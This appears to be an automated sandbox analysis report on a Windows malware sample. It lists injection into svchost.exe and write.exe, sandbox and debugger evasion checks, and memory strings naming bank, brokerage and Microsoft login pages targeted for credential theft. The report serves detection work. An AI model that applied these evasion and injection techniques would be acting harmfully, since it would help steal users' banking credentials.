Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02AF51E9 push 00000009h; retf	5_2_02AF51EB
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02AF51C7 push cs; retf	5_2_02AF51CA
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02AF9161 push cs; retf 002Ah	5_2_02AF9165
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04A62E82 push cs; ret	5_2_04A62E8C

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006BF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_006BF98E
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_00731C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00731C41

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-97048

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	API/Special instruction interceptor: Address: 10C3204
Source: C:\Windows\SysWOW64\write.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\write.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\write.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\write.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\write.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\write.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\write.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\write.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0337096E rdtsc

2_2_0337096E

Source: C:\Windows\SysWOW64\write.exe

Window / User API: threadDelayed 9842

Jump to behavior

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	API coverage: 3.8 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\write.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\write.exe TID: 7064	Thread sleep count: 130 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 7064	Thread sleep time: -260000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 7064	Thread sleep count: 9842 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 7064	Thread sleep time: -19684000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe TID: 1292	Thread sleep time: -70000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe TID: 1292	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe TID: 1292	Thread sleep time: -57000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe TID: 1292	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe TID: 1292	Thread sleep time: -39000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\write.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\write.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_0070DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0070DBBE
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006DC2A2 FindFirstFileExW,	0_2_006DC2A2
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_007168EE FindFirstFileW,FindClose,	0_2_007168EE
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_0071698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0071698F
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_0070D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0070D076
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_0070D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0070D3A9
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_00719642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00719642
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_0071979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0071979D
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_00719B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00719B2B
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_00715C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00715C97
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02B0BC30 FindFirstFileW,FindNextFileW,FindClose,	5_2_02B0BC30

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_006A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_006A42DE

Source: _R39449.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: _R39449.5.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: _R39449.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: _R39449.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: _R39449.5.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: _R39449.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: write.exe, 00000005.00000002.4488869608.0000000002F55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: _R39449.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: _R39449.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: _R39449.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: _R39449.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: _R39449.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: _R39449.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: _R39449.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: _R39449.5.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: _R39449.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: firefox.exe, 00000008.00000002.2586625079.000002538190D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllgg
Source: _R39449.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: _R39449.5.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: _R39449.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: _R39449.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: _R39449.5.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: _R39449.5.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: IwDtIjtyhRCIk.exe, 00000006.00000002.4489961111.000000000141F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
Source: _R39449.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: _R39449.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: _R39449.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: _R39449.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: _R39449.5.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: _R39449.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: _R39449.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: _R39449.5.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: _R39449.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: _R39449.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0337096E rdtsc

2_2_0337096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417633 LdrLoadDll,

2_2_00417633

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_0071EAA2 BlockInput,

0_2_0071EAA2

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_006D2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_006D2622

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_006A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_006A42DE

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006C4CE8 mov eax, dword ptr fs:[00000030h]	0_2_006C4CE8
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_010C3470 mov eax, dword ptr fs:[00000030h]	0_2_010C3470
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_010C34D0 mov eax, dword ptr fs:[00000030h]	0_2_010C34D0
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_010C1E70 mov eax, dword ptr fs:[00000030h]	0_2_010C1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340634F mov eax, dword ptr fs:[00000030h]	2_2_0340634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C310 mov ecx, dword ptr fs:[00000030h]	2_2_0332C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03350310 mov ecx, dword ptr fs:[00000030h]	2_2_03350310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]	2_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]	2_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]	2_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D437C mov eax, dword ptr fs:[00000030h]	2_2_033D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03408324 mov eax, dword ptr fs:[00000030h]	2_2_03408324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03408324 mov ecx, dword ptr fs:[00000030h]	2_2_03408324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03408324 mov eax, dword ptr fs:[00000030h]	2_2_03408324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03408324 mov eax, dword ptr fs:[00000030h]	2_2_03408324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov ecx, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FA352 mov eax, dword ptr fs:[00000030h]	2_2_033FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D8350 mov ecx, dword ptr fs:[00000030h]	2_2_033D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]	2_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]	2_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]	2_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]	2_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]	2_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]	2_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]	2_2_0335438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]	2_2_0335438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033663FF mov eax, dword ptr fs:[00000030h]	2_2_033663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]	2_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]	2_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]	2_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]	2_2_033D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]	2_2_033D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EC3CD mov eax, dword ptr fs:[00000030h]	2_2_033EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]	2_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]	2_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]	2_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]	2_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B63C0 mov eax, dword ptr fs:[00000030h]	2_2_033B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332823B mov eax, dword ptr fs:[00000030h]	2_2_0332823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340625D mov eax, dword ptr fs:[00000030h]	2_2_0340625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]	2_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]	2_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]	2_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332826B mov eax, dword ptr fs:[00000030h]	2_2_0332826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A250 mov eax, dword ptr fs:[00000030h]	2_2_0332A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336259 mov eax, dword ptr fs:[00000030h]	2_2_03336259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h]	2_2_033EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h]	2_2_033EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B8243 mov eax, dword ptr fs:[00000030h]	2_2_033B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B8243 mov ecx, dword ptr fs:[00000030h]	2_2_033B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]	2_2_033402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]	2_2_033402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034062D6 mov eax, dword ptr fs:[00000030h]	2_2_034062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]	2_2_0336E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]	2_2_0336E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]	2_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]	2_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]	2_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]	2_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]	2_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]	2_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03360124 mov eax, dword ptr fs:[00000030h]	2_2_03360124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404164 mov eax, dword ptr fs:[00000030h]	2_2_03404164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404164 mov eax, dword ptr fs:[00000030h]	2_2_03404164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118 mov ecx, dword ptr fs:[00000030h]	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F0115 mov eax, dword ptr fs:[00000030h]	2_2_033F0115
